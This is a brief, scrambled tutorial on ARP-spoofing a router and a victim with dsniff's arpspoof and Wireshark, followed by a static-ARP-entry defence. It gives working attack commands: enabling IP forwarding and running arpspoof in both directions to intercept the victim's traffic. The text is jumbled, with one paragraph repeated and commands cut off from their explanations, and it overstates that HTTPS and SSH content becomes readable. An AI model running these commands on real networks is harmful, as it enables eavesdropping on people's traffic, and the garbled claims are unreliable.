Suposing we've installed a linux with dsniff tool, we have to enable routing in system's kernel:
We have to create two different process for establishing a connection between the two machines (router and victim) and us:
Now we can execute
Wireshark
(Packet analyzer) and view what is the information encapsulated in the IP packets sended between router and victim.
As this tecnique is like a " man in the middle " (We are between victim and router), we also can know SSL encrypted information like HTTPS or SSH protocols can offer, we only have to emulate a secure server.
Once we know the MAC, we have to add manually a permanent ARP entry with the next command:
sysctl
-w net.ipv4.ip_forward=
1
arpspoof
-i eth0 ROUTER_IP_ADDRESS
-t VICTIM_IP_ADDRESS
arpspoof
-i eth0 VICTIM_IP_ADDRESS
-t ROUTER_IP_ADDRESS
As this tecnique is like a " man in the middle " (We are between victim and router), we also can know SSL encrypted information like HTTPS or SSH protocols can offer, we only have to emulate a secure server.
How to prevent it
First we have to know the router hardware address (MAC), for it we can search in our ARP table an address like router with:
arp
arp
-s ROUTER_IP_ADDRESS ROUTER_HW_ADDRESS